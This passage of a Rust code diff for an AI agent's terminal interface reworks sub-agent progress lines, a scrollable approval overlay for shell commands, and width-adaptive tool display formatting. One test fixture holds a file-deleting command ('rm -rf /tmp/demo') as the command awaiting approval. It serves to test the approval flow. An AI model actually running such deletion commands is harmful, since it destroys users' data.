                                 result_preview.as_deref(),
                                 is_error,
+                                widths.verbose_content,
                             ) {
                                 self.push_output_spans(line, OutputRole::Tool);
                             }
@@ -12267,15 +12309,31 @@ impl App {
                         },
                     );
                     self.streaming_line = None;
+                    // Push a running placeholder and record its index so that
+                    // SubAgentReasoning / SubAgentToolExec can update it in-place,
+                    // and SubAgentFinish can replace it — exactly like ToolExec/ToolDone.
+                    let widths =
+                        DisplayWidths::from_terminal_width(self.last_terminal_width as usize);
+                    let running_spans = build_subagent_running_line_width(
+                        task_index, task_count, &goal, None, 0, &widths,
+                    );
+                    let line_idx = self.output.len();
                     self.output.push(OutputLine {
                         text: String::new(),
                         role: OutputRole::Tool,
-                        prebuilt_spans: Some(build_subagent_event_line(
-                            task_index, task_count, "subagent", &goal, "running",
-                        )),
+                        prebuilt_spans: Some(running_spans),
                         rendered: None,
                         plain_rendered: None,
                     });
+                    self.pending_subagent_lines.insert(
+                        task_index,
+                        PendingSubagentLine {
+                            line_idx,
+                            started_at: Instant::now(),
+                            goal: goal.clone(),
+                            task_count,
+                        },
+                    );
                     if self.at_bottom {
                         self.scroll_offset = 0;
                     }
@@ -12287,24 +12345,45 @@ impl App {
                     text,
                 } => {
                     self.progress_seq = self.progress_seq.saturating_add(1);
+                    let detail = format!(
+                        "thinking: {}",
+                        edgecrab_core::safe_truncate(text.trim(), 72)
+                    );
                     if let Some(status) = self.active_subagents.get_mut(&task_index) {
-                        status.last_detail = Some(format!(
-                            "thinking: {}",
-                            edgecrab_core::safe_truncate(text.trim(), 72)
-                        ));
+                        status.last_detail = Some(detail.clone());
                         status.last_seq = self.progress_seq;
+                    }
+                    // Update running placeholder in-place — no new lines pushed.
+                    if let Some(pending) = self.pending_subagent_lines.get(&task_index) {
+                        let line_idx = pending.line_idx;
+                        let goal = pending.goal.clone();
+                        let task_count = pending.task_count;
+                        let elapsed = pending.started_at.elapsed().as_secs();
+                        if line_idx < self.output.len() {
+                            let widths = DisplayWidths::from_terminal_width(
+                                self.last_terminal_width as usize,
+                            );
+                            self.output[line_idx].prebuilt_spans =
+                                Some(build_subagent_running_line_width(
+                                    task_index,
+                                    task_count,
+                                    &goal,
+                                    Some(&detail),
+                                    elapsed,
+                                    &widths,
+                                ));
+                            self.output[line_idx].invalidate_render_cache();
+                        }
                     }
                     self.needs_redraw = true;
                 }
                 AgentResponse::SubAgentToolExec {
                     task_index,
-                    task_count,
+                    task_count: _task_count,
                     name,
                     args_json,
                 } => {
-                    self.flush_buffered_assistant_output();
                     self.progress_seq = self.progress_seq.saturating_add(1);
-                    self.streaming_line = None;
                     let preview = crate::tool_display::extract_tool_preview(&name, &args_json);
                     let detail = if preview.is_empty() {
                         name.clone()
@@ -12315,15 +12394,30 @@ impl App {
                         status.last_detail = Some(detail.clone());
                         status.last_seq = self.progress_seq;
                     }
-                    self.output.push(OutputLine {
-                        text: String::new(),
-                        role: OutputRole::Tool,
-                        prebuilt_spans: Some(build_subagent_event_line(
-                            task_index, task_count, "tool", &detail, "running",
-                        )),
-                        rendered: None,
-                        plain_rendered: None,
-                    });
+                    // Update the running placeholder in-place — do NOT push a new line.
+                    // Showing every sub-agent tool call as a permanent line creates
+                    // O(tool_calls × subagents) output noise.
+                    if let Some(pending) = self.pending_subagent_lines.get(&task_index) {
+                        let line_idx = pending.line_idx;
+                        let goal = pending.goal.clone();
+                        let task_count = pending.task_count;
+                        let elapsed = pending.started_at.elapsed().as_secs();
+                        if line_idx < self.output.len() {
+                            let widths = DisplayWidths::from_terminal_width(
+                                self.last_terminal_width as usize,
+                            );
+                            self.output[line_idx].prebuilt_spans =
+                                Some(build_subagent_running_line_width(
+                                    task_index,
+                                    task_count,
+                                    &goal,
+                                    Some(&detail),
+                                    elapsed,
+                                    &widths,
+                                ));
+                            self.output[line_idx].invalidate_render_cache();
+                        }
+                    }
                     if self.at_bottom {
                         self.scroll_offset = 0;
                     }
@@ -12340,41 +12434,31 @@ impl App {
                 } => {
                     self.active_subagents.remove(&task_index);
                     self.streaming_line = None;
-                    let mut parts = vec![
-                        format!("{} in {:.1}s", status, duration_ms as f64 / 1000.0),
-                        format!("api {api_calls}"),
-                    ];
-                    if let Some(model) = model.filter(|m| !m.is_empty()) {
-                        parts.push(model);
-                    }
-                    if !summary.trim().is_empty() {
-                        parts.push(
-                            summary
-                                .lines()
-                                .next()
-                                .unwrap_or_default()
-                                .trim()
-                                .to_string(),
-                        );
-                    }
-                    let tone = if status == "completed" {
-                        "success"
+                    let is_error = status != "completed";
+                    let widths =
+                        DisplayWidths::from_terminal_width(self.last_terminal_width as usize);
+                    let done_spans = build_subagent_done_line_width(
+                        task_index,
+                        task_count,
+                        is_error,
+                        duration_ms,
+                        api_calls,
+                        model.as_deref().filter(|m| !m.is_empty()),
+                        summary.trim(),
+                        &widths,
+                    );
+                    // Replace the running placeholder in-place; fall back to append when
+                    // the placeholder is missing (e.g. session restore, race condition).
+                    if let Some(pending) = self.pending_subagent_lines.remove(&task_index) {
+                        if pending.line_idx < self.output.len() {
+                            self.output[pending.line_idx].prebuilt_spans = Some(done_spans);
+                            self.output[pending.line_idx].invalidate_render_cache();
+                        } else {
+                            self.push_output_spans(done_spans, OutputRole::Tool);
+                        }
                     } else {
-                        "error"
-                    };
-                    self.output.push(OutputLine {
-                        text: String::new(),
-                        role: OutputRole::Tool,
-                        prebuilt_spans: Some(build_subagent_event_line(
-                            task_index,
-                            task_count,
-                            "subagent",
-                            &parts.join("  "),
-                            tone,
-                        )),
-                        rendered: None,
-                        plain_rendered: None,
-                    });
+                        self.push_output_spans(done_spans, OutputRole::Tool);
+                    }
                     if self.at_bottom {
                         self.scroll_offset = 0;
                     }
@@ -12472,14 +12556,11 @@ impl App {
                     } else {
                         // Surface the approval overlay.
                         self.display_state = DisplayState::WaitingForApproval {
-                            command: if command.len() > 50 {
-                                format!("{}…", edgecrab_core::safe_truncate(&command, 47))
-                            } else {
-                                command
-                            },
+                            command: command.clone(),
                             full_command,
                             selected: 0,
                             show_full: false,
+                            scroll_offset: 0,
                         };
                         self.approval_pending_tx = Some(response_tx);
                         self.needs_redraw = true;
@@ -12847,6 +12928,24 @@ impl App {
                 } = self.display_state
                 {
                     *show_full = !*show_full;
+                }
+            }
+            KeyCode::Up | KeyCode::Char('k') => {
+                if let DisplayState::WaitingForApproval {
+                    ref mut scroll_offset,
+                    ..
+                } = self.display_state
+                {
+                    *scroll_offset = scroll_offset.saturating_add(1);
+                }
+            }
+            KeyCode::Down | KeyCode::Char('j') => {
+                if let DisplayState::WaitingForApproval {
+                    ref mut scroll_offset,
+                    ..
+                } = self.display_state
+                {
+                    *scroll_offset = scroll_offset.saturating_sub(1);
                 }
             }
             KeyCode::Enter => {
@@ -21040,6 +21139,9 @@ impl App {
 
     /// Render the full application frame.
     pub fn render(&mut self, frame: &mut Frame) {
+        // Cache terminal width for event handlers that build tool display spans
+        self.last_terminal_width = frame.area().width;
+
         let textarea_height = self.input_area_height_for_area(frame.area());
         let chunks = Layout::default()
             .direction(Direction::Vertical)
@@ -21631,7 +21733,13 @@ impl App {
                         .as_deref()
                         .filter(|detail| !detail.trim().is_empty())
                         .map(|detail| edgecrab_core::safe_truncate(detail.trim(), 60).to_string())
-                        .unwrap_or_else(|| tool_status_preview(name, args_json));
+                        .unwrap_or_else(|| {
+                            // Use width-adaptive preview — status bar has more room on wide terminals.
+                            let widths = DisplayWidths::from_terminal_width(
+                                self.last_terminal_width as usize,
+                            );
+                            tool_status_preview_width(name, args_json, widths.status_preview)
+                        });
                     format!(" {spinner} {verb} {icon} {preview}{time_part}{stop_hint} ")
                 };
                 left_spans.push(Span::styled(
@@ -21770,6 +21878,18 @@ impl App {
             format!(" ${:.4}", self.session_cost),
             cost_style,
         ));
+
+        // ── Context pressure gauge ───────────────────────────────────
+        if self.context_window.is_some() {
+            left_spans.push(Span::styled(
+                " │ ",
+                Style::default().fg(Color::Rgb(50, 50, 65)),
+            ));
+            let gauge_spans =
+                build_context_gauge(self.total_tokens, self.context_window.unwrap_or(0));
+            left_spans.extend(gauge_spans);
+        }
+
         if let Some(presence) = self.voice_presence_state() {
             left_spans.push(Span::styled(
                 " │ ",
@@ -27963,15 +28083,21 @@ impl App {
 
     fn render_approval_overlay(&self, frame: &mut Frame, area: Rect) {
         // Only render when in WaitingForApproval state
-        let (command, show_full, full_command, selected) =
+        let (command, full_command, selected, scroll_offset) =
             if let DisplayState::WaitingForApproval {
                 ref command,
                 ref full_command,
-                show_full,
                 selected,
+                scroll_offset,
+                ..
             } = self.display_state
             {
-                (command.as_str(), show_full, full_command.as_str(), selected)
+                (
+                    command.as_str(),
+                    full_command.as_str(),
+                    selected,
+                    scroll_offset,
+                )
             } else {
                 return;
             };
@@ -27981,14 +28107,19 @@ impl App {
         let chunks = Layout::default()
             .direction(Direction::Vertical)
             .constraints([
-                Constraint::Min(1),    // command display + optional full view
+                Constraint::Min(1),    // command display (wrapped + scrollable)
                 Constraint::Length(3), // choice buttons
                 Constraint::Length(1), // help line
             ])
             .split(area);
 
-        // ── Command display ──────────────────────────────────────────
-        let cmd_text = if show_full { full_command } else { command };
+        // ── Command display — always show full command, wrapped and scrollable ──
+        // Use full_command if it differs from command; otherwise command is already full.
+        let cmd_text = if full_command.is_empty() {
+            command
+        } else {
+            full_command
+        };
         let cmd_lines: Vec<Line> = cmd_text
             .lines()
             .map(|l| {
@@ -28013,7 +28144,8 @@ impl App {
                     .border_style(Style::default().fg(Color::Rgb(255, 140, 0)))
                     .title(" ⚠  Approval required "),
             )
-            .wrap(Wrap { trim: false });
+            .wrap(Wrap { trim: false })
+            .scroll((scroll_offset, 0));
         frame.render_widget(cmd_para, chunks[0]);
 
         // ── Choice buttons ───────────────────────────────────────────
@@ -28032,15 +28164,6 @@ impl App {
             btn_spans.push(Span::styled(format!(" [{label}] "), style));
             btn_spans.push(Span::raw(" "));
         }
-        // View toggle indicator
-        let view_style = if show_full {
-            Style::default()
-                .fg(Color::Rgb(255, 140, 0))
-                .add_modifier(Modifier::BOLD)
-        } else {
-            Style::default().fg(Color::Rgb(100, 100, 130))
-        };
-        btn_spans.push(Span::styled(" [v]iew ", view_style));
 
         let buttons = Paragraph::new(Line::from(btn_spans)).block(
             Block::default()
@@ -28053,10 +28176,10 @@ impl App {
         let help = Paragraph::new(Line::from(vec![
             Span::styled(" ← → ", Style::default().fg(Color::Rgb(255, 140, 0))),
             Span::styled("select  ", Style::default().fg(Color::DarkGray)),
+            Span::styled("↑ ↓ ", Style::default().fg(Color::Rgb(255, 140, 0))),
+            Span::styled("scroll  ", Style::default().fg(Color::DarkGray)),
             Span::styled("Enter ", Style::default().fg(Color::Rgb(255, 140, 0))),
             Span::styled("confirm  ", Style::default().fg(Color::DarkGray)),
-            Span::styled("v ", Style::default().fg(Color::Rgb(255, 140, 0))),
-            Span::styled("view full  ", Style::default().fg(Color::DarkGray)),
             Span::styled("Esc ", Style::default().fg(Color::Rgb(255, 140, 0))),
             Span::styled("deny", Style::default().fg(Color::DarkGray)),
         ]));
@@ -31707,6 +31830,7 @@ kind = "skill"
             full_command: "rm -rf /tmp/demo".into(),
             selected: 0,
             show_full: false,
+            scroll_offset: 0,
         };
 
         app.handle_approval_choice_command(edgecrab_core::ApprovalChoice::Session);
@@ -32898,7 +33022,8 @@ kind = "skill"
         app.check_responses();
 
         assert_eq!(app.output.len(), 3);
-        assert!(line_spans_text(&app.output[1]).contains("args"));
+        // Verbose line now shows the command value directly (no "args:" prefix).
+        assert!(line_spans_text(&app.output[1]).contains("cargo"));
         assert!(line_spans_text(&app.output[2]).contains("test result: ok"));
     }
 

--- a/crates/edgecrab-cli/src/tool_display.rs
+++ b/crates/edgecrab-cli/src/tool_display.rs
@@ -7,6 +7,7 @@
 //! - argument preview (`extract_tool_preview`)
 //! - full ratatui span builders (`build_tool_done_line`, `build_tool_running_line`)
 //! - combined status-bar preview (`tool_status_preview`)
+//! - `DisplayWidths` — single source of truth for column budgets
 //!
 //! None of these functions depend on `App`; they are pure string/span transforms.
 
@@ -15,6 +16,180 @@ use ratatui::{
     text::Span,
 };
 use unicode_width::{UnicodeWidthChar, UnicodeWidthStr};
+
+// ── DisplayWidths — single source of truth for column budgets ───────────────
+
+/// Column budget calculator that adapts all display widths to the terminal size.
+///
+/// Follows a proportional allocation scheme:
+/// - **name**: fixed 12–18 cols (capped)
+/// - **preview**: ~30% of remaining width after chrome
+/// - **result**: ~35% of remaining width after chrome
+/// - **duration**: fixed 8 cols
+/// - **chrome** (bar, emoji, spaces): fixed 6 cols
+#[derive(Debug, Clone, Copy)]
+pub struct DisplayWidths {
+    /// Tool label column width (e.g. "search", "write")
+    pub name: usize,
+    /// Argument preview column width
+    pub preview: usize,
+    /// Result preview column width
+    pub result: usize,
+    /// Verbose-mode content width (args/result lines)
+    pub verbose_content: usize,
+    /// Status bar tool preview width
+    pub status_preview: usize,
+}
+
+impl DisplayWidths {
+    /// Default widths for an 80-column terminal (backward-compatible).
+    pub const DEFAULT: Self = Self {
+        name: 18,
+        preview: 44,
+        result: 52,
+        verbose_content: 108,
+        status_preview: 45,
+    };
+
+    /// Compute proportional column budgets from terminal width.
+    pub fn from_terminal_width(w: usize) -> Self {
+        if w <= 80 {
+            return Self::DEFAULT;
+        }
+
+        // Fixed chrome per line: "  ┊ " (4) + emoji (3) + name (18) + "-> " (3) + duration (8) = 36
+        const FIXED_CHROME: usize = 36;
+        let content_budget = w.saturating_sub(FIXED_CHROME);
+
+        // Split content budget between preview (46%) and result (54%)
+        // — matches the 44:52 ratio of DEFAULT at 80 cols.
+        let preview = (content_budget * 46 / 100).max(20);
+        let result = (content_budget * 54 / 100).max(20);
+
+        let name = 18usize;
+
+        // Verbose: nearly full width minus indentation (14 cols for "     label    ")
+        let verbose_content = w.saturating_sub(14).max(40);
+
+        // Status bar preview: ~40% of terminal width, capped
+        let status_preview = (w * 40 / 100).clamp(30, 80);
+
+        Self {
+            name,
+            preview,
+            result,
+            verbose_content,
+            status_preview,
+        }
+    }
+}
+
+// ── Tool category — semantic grouping for display colors ─────────────────────
+
+/// Semantic category for a tool name used to select display colors.
+///
+/// Having distinct color families lets users instantly distinguish file edits
+/// from shell commands, web fetches from memory writes, etc. — without reading
+/// the label.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum ToolCategory {
+    Search,
+    WebBrowser,
+    FileRead,
+    FileWrite,
+    Terminal,
+    Memory,
+    Plan,
+    Ai,
+    Mcp,
+    Ha,
+    Other,
+}
+
+impl ToolCategory {
+    /// Foreground color for the tool name column (done and running lines).
+    pub fn name_color(self) -> Color {
+        match self {
+            ToolCategory::Search => Color::Rgb(80, 210, 230), // cyan
+            ToolCategory::WebBrowser => Color::Rgb(64, 188, 212), // teal
+            ToolCategory::FileRead => Color::Rgb(150, 165, 195), // slate
+            ToolCategory::FileWrite => Color::Rgb(255, 185, 50), // amber
+            ToolCategory::Terminal => Color::Rgb(255, 145, 60), // orange
+            ToolCategory::Memory => Color::Rgb(110, 195, 135), // sage green
+            ToolCategory::Plan => Color::Rgb(140, 170, 255),  // periwinkle
+            ToolCategory::Ai => Color::Rgb(185, 145, 240),    // violet
+            ToolCategory::Mcp => Color::Rgb(130, 165, 210),   // steel blue
+            ToolCategory::Ha => Color::Rgb(100, 195, 145),    // green
+            ToolCategory::Other => Color::Rgb(170, 180, 205), // gray
+        }
+    }
+}
+
+/// Classify a tool name into a display category for color selection.
+pub fn tool_category(name: &str) -> ToolCategory {
+    if name == "web_search" || name == "search_files" || name == "session_search" {
+        return ToolCategory::Search;
+    }
+    if name.starts_with("web_") || name.starts_with("browser_") {
+        return ToolCategory::WebBrowser;
+    }
+    if name == "read_file" {
+        return ToolCategory::FileRead;
+    }
+    if name == "write_file"
+        || name == "patch"
+        || name == "apply_patch"
+        || name.contains("delete")
+        || name.contains("move_file")
+    {
+        return ToolCategory::FileWrite;
+    }
+    if name == "terminal" || name == "execute_code" || name.starts_with("process") {
+        return ToolCategory::Terminal;
+    }
+    if name == "memory" {
+        return ToolCategory::Memory;
+    }
+    if name == "todo" || name == "manage_todo_list" {
+        return ToolCategory::Plan;
+    }
+    if name.contains("vision")
+        || name.contains("tts")
+        || name.contains("speech")
+        || name.contains("transcrib")
+        || name.contains("image")
+        || name == "delegate_task"
+    {
+        return ToolCategory::Ai;
+    }
+    if name.starts_with("mcp_") {
+        return ToolCategory::Mcp;
+    }
+    if name.starts_with("ha_") {
+        return ToolCategory::Ha;
+    }
+    ToolCategory::Other
+}
+
+// ── Duration formatting ───────────────────────────────────────────────────────
+
+/// Format a completion duration for the tool line timing column.
+///
+/// Targets a consistent 5-character display width so timing glances are fast:
+/// `"  1ms"`, `"999ms"`, `" 1.0s"`, `"10.0s"`, `"1m05s"`
+fn format_duration_aligned(ms: u64) -> String {
+    if ms < 1_000 {
+        format!("{ms:>3}ms") // "  1ms" .. "999ms" (5 chars)
+    } else if ms < 10_000 {
+        format!(" {:.1}s", ms as f64 / 1000.0) // " 1.0s" (5 chars)
+    } else if ms < 60_000 {
+        format!("{:.1}s", ms as f64 / 1000.0) // "10.0s" (5 chars)
+    } else {
+        let secs = ms / 1000;
+        let mins = secs / 60;
+        format!("{mins}m{:02}s", secs % 60) // "1m05s" (5 chars)
+    }
+}
 
 // ── Internal Unicode helpers (mirrored from app.rs) ─────────────────────────
 
@@ -281,7 +456,10 @@ fn json_value_preview(val: &serde_json::Value) -> Option<String> {
 ///  1. Try keys in a priority order that covers the most "meaningful" args.
 ///  2. Show `key: value` so the display is self-documenting for any tool.
 ///  3. Fall back to the first non-trivial key-value pair in the object.
-fn extract_generic_preview(obj: &serde_json::Map<String, serde_json::Value>) -> String {
+fn extract_generic_preview(
+    obj: &serde_json::Map<String, serde_json::Value>,
+    max_cols: usize,
+) -> String {
     const PRIORITY: &[&str] = &[
         "query",
         "url",
@@ -318,7 +496,7 @@ fn extract_generic_preview(obj: &serde_json::Map<String, serde_json::Value>) -> 
     for &key in PRIORITY {
         if let Some(val) = obj.get(key) {
             if let Some(preview) = json_value_preview(val) {
-                return unicode_trunc(&format!("{key}: {preview}"), 44);
+                return unicode_trunc(&format!("{key}: {preview}"), max_cols);
             }
         }
     }
@@ -328,7 +506,7 @@ fn extract_generic_preview(obj: &serde_json::Map<String, serde_json::Value>) -> 
             continue;
         }
         if let Some(preview) = json_value_preview(val) {
-            return unicode_trunc(&format!("{key}: {preview}"), 44);
+            return unicode_trunc(&format!("{key}: {preview}"), max_cols);
         }
     }
 
@@ -399,6 +577,14 @@ pub fn tool_label(tool_name: &str) -> String {
 }
 
 pub fn extract_tool_preview(tool_name: &str, args_json: &str) -> String {
+    extract_tool_preview_width(tool_name, args_json, DisplayWidths::DEFAULT.preview)
+}
+
+pub fn extract_tool_preview_width(
+    tool_name: &str,
+    args_json: &str,
+    max_preview_cols: usize,
+) -> String {
     let Some(obj) = args_object(args_json) else {
         return String::new();
     };
@@ -713,8 +899,8 @@ pub fn extract_tool_preview(tool_name: &str, args_json: &str) -> String {
 
     preview
         .filter(|text| !text.trim().is_empty())
-        .map(|text| unicode_trunc(&text, 44))
-        .unwrap_or_else(|| extract_generic_preview(&obj))
+        .map(|text| unicode_trunc(&text, max_preview_cols))
+        .unwrap_or_else(|| extract_generic_preview(&obj, max_preview_cols))
 }
 
 pub fn tool_signature(tool_name: &str, args_json: &str) -> String {
@@ -726,62 +912,187 @@ pub fn tool_signature(tool_name: &str, args_json: &str) -> String {
     }
 }
 
+#[allow(dead_code)]
 pub fn build_tool_verbose_lines(
     tool_name: &str,
     args_json: &str,
     result_preview: Option<&str>,
     is_error: bool,
 ) -> Vec<Vec<Span<'static>>> {
+    build_tool_verbose_lines_width(
+        tool_name,
+        args_json,
+        result_preview,
+        is_error,
+        DisplayWidths::DEFAULT.verbose_content,
+    )
+}
+
+// ── Verbose-mode helpers ─────────────────────────────────────────────────────
+
+/// Build a structured one-line summary for verbose-mode args display.
+///
+/// Replaces the previous raw JSON dump (`"args  {json}"`) with a human-readable
+/// preview using the same rich tool-aware extract logic as the compact display.
+/// Falls back to top-3 key-value pairs for unknown tools, never to raw JSON.
+fn build_verbose_args_summary(tool_name: &str, args_json: &str, max_width: usize) -> String {
+    // Prefer the rich tool-aware preview (same as compact line but with more budget).
+    let preview = extract_tool_preview_width(tool_name, args_json, max_width.saturating_sub(2));
+    if !preview.is_empty() {
+        return preview;
+    }
+    // Fallback: render top-3 key-value pairs (skip known large-payload keys).
+    const SKIP_LARGE: &[&str] = &["content", "code", "patch", "data", "body", "html"];
+    if let Some(obj) = args_object(args_json) {
+        let pairs: Vec<String> = obj
+            .iter()
+            .filter(|(k, _)| !SKIP_LARGE.contains(&k.as_str()))
+            .take(3)
+            .filter_map(|(k, v)| {
+                json_value_preview(v).map(|pv| format!("{k}: {}", unicode_trunc(&pv, 28)))
+            })
+            .collect();
+        if !pairs.is_empty() {
+            return unicode_trunc(&pairs.join(" · "), max_width);
+        }
+    }
+    String::new()
+}
+
+/// Build a content-stat hint for verbose mode when a tool carries large payload.
+/// Returns `None` for tools without notable content.
+fn build_verbose_content_stat(tool_name: &str, args_json: &str) -> Option<String> {
+    let obj = args_object(args_json)?;
+    match tool_name {
+        "write_file" => {
+            let content = obj.get("content").and_then(|v| v.as_str())?;
+            let line_count = content.lines().count();
+            let bytes = content.len();
+            let size = if bytes >= 1024 {
+                format!("{:.1}k", bytes as f64 / 1024.0)
+            } else {
+                format!("{bytes}b")
+            };
+            Some(format!("content: <{line_count} lines, {size}>"))
+        }
+        "apply_patch" | "patch" => {
+            let patch = obj.get("patch").and_then(|v| v.as_str())?;
+            let targets = extract_patch_targets(patch);
+            let total = targets.len();
+            if total == 0 {
+                return None;
+            }
+            let adds: usize = patch.lines().filter(|l| l.starts_with("+++")).count();
+            let dels: usize = patch.lines().filter(|l| l.starts_with("---")).count();
+            Some(format!("patch: {total} file(s) · +{adds} −{dels} hunks"))
+        }
+        "terminal" | "execute_code" => {
+            let is_bg = obj
+                .get("background")
+                .and_then(|v| v.as_bool())
+                .unwrap_or(false);
+            let timeout = obj.get("timeout").and_then(|v| v.as_u64());
+            let mut parts: Vec<String> = Vec::new();
+            if is_bg {
+                parts.push("background".into());
+            }
+            if let Some(t) = timeout {
+                parts.push(format!("timeout: {t}s"));
+            }
+            if parts.is_empty() {
+                None
+            } else {
+                Some(parts.join(" · "))
+            }
+        }
+        _ => None,
+    }
+}
+
+pub fn build_tool_verbose_lines_width(
+    tool_name: &str,
+    args_json: &str,
+    result_preview: Option<&str>,
+    is_error: bool,
+    verbose_width: usize,
+) -> Vec<Vec<Span<'static>>> {
     if matches!(tool_name, "todo" | "manage_todo_list") {
-        return build_todo_verbose_lines(args_json, result_preview, is_error);
+        return build_todo_verbose_lines(args_json, result_preview, is_error, verbose_width);
     }
 
     let mut lines = Vec::new();
-    let label = tool_label(tool_name);
-    let args_line = unicode_trunc(&format!("args  {args_json}"), 108);
+    let category = tool_category(tool_name);
+    let label = unicode_trunc(&tool_label(tool_name), 9);
+    let indent = Span::styled(
+        "     ",
+        Style::default()
+            .fg(Color::Rgb(48, 52, 62))
+            .add_modifier(Modifier::DIM),
+    );
+    let label_style = Style::default()
+        .fg(category.name_color())
+        .add_modifier(Modifier::DIM);
+
+    // Structured summary — no more raw JSON dumps.
+    let args_summary = build_verbose_args_summary(tool_name, args_json, verbose_width);
     lines.push(vec![
+        indent.clone(),
+        Span::styled(unicode_pad_right(&label, 9), label_style),
         Span::styled(
-            "     ",
+            args_summary,
             Style::default()
-                .fg(Color::Rgb(52, 56, 66))
-                .add_modifier(Modifier::DIM),
-        ),
-        Span::styled(
-            unicode_pad_right(&label, 9),
-            Style::default()
-                .fg(Color::Rgb(108, 118, 138))
-                .add_modifier(Modifier::DIM),
-        ),
-        Span::styled(
-            args_line,
-            Style::default()
-                .fg(Color::Rgb(120, 132, 152))
+                .fg(Color::Rgb(115, 128, 150))
                 .add_modifier(Modifier::DIM),
         ),
     ]);
+
+    // For tools with large payload, add a content-stat hint line.
+    if let Some(stat) = build_verbose_content_stat(tool_name, args_json) {
+        lines.push(vec![
+            indent.clone(),
+            Span::styled(
+                unicode_pad_right("", 9),
+                Style::default()
+                    .fg(Color::Rgb(80, 92, 112))
+                    .add_modifier(Modifier::DIM),
+            ),
+            Span::styled(
+                unicode_trunc(&stat, verbose_width),
+                Style::default()
+                    .fg(Color::Rgb(90, 102, 125))
+                    .add_modifier(Modifier::DIM),
+            ),
+        ]);
+    }
+
     if let Some(result) = result_preview
         .map(str::trim)
         .filter(|text| !text.is_empty())
     {
+        // Use the same rich-result formatter as the compact done-line so
+        // verbose mode benefits from per-tool formatting with a wider budget.
+        let rich = format_tool_result(tool_name, result, verbose_width);
+        let display = if rich.is_empty() {
+            unicode_trunc(result, verbose_width)
+        } else {
+            rich
+        };
         lines.push(vec![
-            Span::styled(
-                "     ",
-                Style::default()
-                    .fg(Color::Rgb(52, 56, 66))
-                    .add_modifier(Modifier::DIM),
-            ),
+            indent,
             Span::styled(
                 unicode_pad_right("result", 9),
                 Style::default()
-                    .fg(Color::Rgb(108, 118, 138))
+                    .fg(Color::Rgb(100, 112, 135))
                     .add_modifier(Modifier::DIM),
             ),
             Span::styled(
-                unicode_trunc(result, 108),
+                display,
                 if is_error {
-                    Style::default().fg(Color::Rgb(235, 170, 170))
+                    Style::default()
+                        .fg(Color::Rgb(255, 120, 120))
+                        .add_modifier(Modifier::BOLD)
                 } else {
-                    Style::default().fg(Color::Rgb(148, 198, 164))
+                    Style::default().fg(Color::Rgb(148, 208, 168))
                 },
             ),
         ]);
@@ -793,6 +1104,7 @@ fn build_todo_verbose_lines(
     args_json: &str,
     result_preview: Option<&str>,
     is_error: bool,
+    verbose_width: usize,
 ) -> Vec<Vec<Span<'static>>> {
     let mut lines = Vec::new();
     let obj = args_object(args_json).unwrap_or_default();
@@ -823,7 +1135,7 @@ fn build_todo_verbose_lines(
                 .add_modifier(Modifier::DIM),
         ),
         Span::styled(
-            unicode_trunc(summary, 108),
+            unicode_trunc(summary, verbose_width),
             if is_error {
                 Style::default().fg(Color::Rgb(235, 170, 170))
             } else {
@@ -870,7 +1182,10 @@ fn build_todo_verbose_lines(
                     .add_modifier(Modifier::DIM),
             ),
             Span::styled(format!("{badge} "), badge_style),
-            Span::styled(unicode_trunc(&title, 92), text_style),
+            Span::styled(
+                unicode_trunc(&title, verbose_width.saturating_sub(16)),
+                text_style,
+            ),
         ]);
     }
 
@@ -899,7 +1214,10 @@ fn build_todo_verbose_lines(
 /// Build a rich tool-completion display line for the output area.
 ///
 /// Format (separate Span values so ratatui width-accounting is correct):
-///   ┊ [emoji]  [tool name · 18 cols]  [key: value preview]   [timing]
+///   ┊ [emoji]  [tool name · name_w cols]  [key: value preview]   [timing]
+///
+/// Column widths adapt to `widths` (computed from terminal width).
+#[allow(dead_code)]
 pub fn build_tool_done_line(
     tool_name: &str,
     args_json: &str,
@@ -908,14 +1226,30 @@ pub fn build_tool_done_line(
     is_error: bool,
     emoji_overrides: &std::collections::HashMap<String, String>,
 ) -> Vec<Span<'static>> {
-    let preview = extract_tool_preview(tool_name, args_json);
+    build_tool_done_line_width(
+        tool_name,
+        args_json,
+        result_preview,
+        duration_ms,
+        is_error,
+        emoji_overrides,
+        &DisplayWidths::DEFAULT,
+    )
+}
+
+pub fn build_tool_done_line_width(
+    tool_name: &str,
+    args_json: &str,
+    result_preview: Option<&str>,
+    duration_ms: u64,
+    is_error: bool,
+    emoji_overrides: &std::collections::HashMap<String, String>,
+    widths: &DisplayWidths,
+) -> Vec<Span<'static>> {
+    let preview = extract_tool_preview_width(tool_name, args_json, widths.preview);
     let result_preview = result_preview.unwrap_or("").trim();
 
-    let dur = if duration_ms >= 1000 {
-        format!("{:.1}s", duration_ms as f64 / 1000.0)
-    } else {
-        format!("{duration_ms}ms")
-    };
+    let dur = format_duration_aligned(duration_ms);
 
     let emoji: &str = if is_error {
         "❌"
@@ -926,54 +1260,64 @@ pub fn build_tool_done_line(
             .unwrap_or_else(|| tool_emoji(tool_name))
     };
 
-    let label = tool_label(tool_name);
-    let name_padded = unicode_pad_right(&label, 18);
+    // FIX: truncate label before padding so names never blow the column budget.
+    let label = unicode_trunc(&tool_label(tool_name), widths.name);
+    let name_padded = unicode_pad_right(&label, widths.name);
 
-    let preview_part = if preview.is_empty() {
+    // FIX: right-pad preview to a fixed column width so the result separator
+    // always appears at the same horizontal position on every tool line.
+    let preview_col = format!(" {}", unicode_pad_right(&preview, widths.preview));
+
+    // Apply per-tool rich formatting so the result column shows the most useful
+    // signal (exit code, item count, title…) rather than a raw truncated string.
+    let rich_result = if result_preview.is_empty() {
         String::new()
     } else {
-        format!(" {preview}")
+        format_tool_result(tool_name, result_preview, widths.result)
     };
-    let result_part = if result_preview.is_empty() {
+    let result_part = if rich_result.is_empty() {
         String::new()
     } else {
-        format!(
-            "  {} {}",
-            if is_error { "!" } else { "->" },
-            unicode_trunc(result_preview, 52)
-        )
+        format!("  {} {}", if is_error { "✗" } else { "→" }, rich_result)
     };
 
+    // Semantic colors: each tool category gets a distinct hue so users can
+    // visually distinguish file edits, terminal commands, web searches, etc.
+    let category = tool_category(tool_name);
     let bar_style = Style::default()
-        .fg(Color::Rgb(60, 60, 72))
+        .fg(Color::Rgb(55, 58, 70))
         .add_modifier(Modifier::DIM);
     let emoji_style = if is_error {
-        Style::default().fg(Color::Rgb(239, 83, 80))
+        Style::default()
+            .fg(Color::Rgb(255, 80, 80))
+            .add_modifier(Modifier::BOLD)
     } else {
-        Style::default().fg(Color::Rgb(255, 191, 0))
+        Style::default().fg(category.name_color())
     };
     let name_style = if is_error {
-        Style::default().fg(Color::Rgb(239, 83, 80))
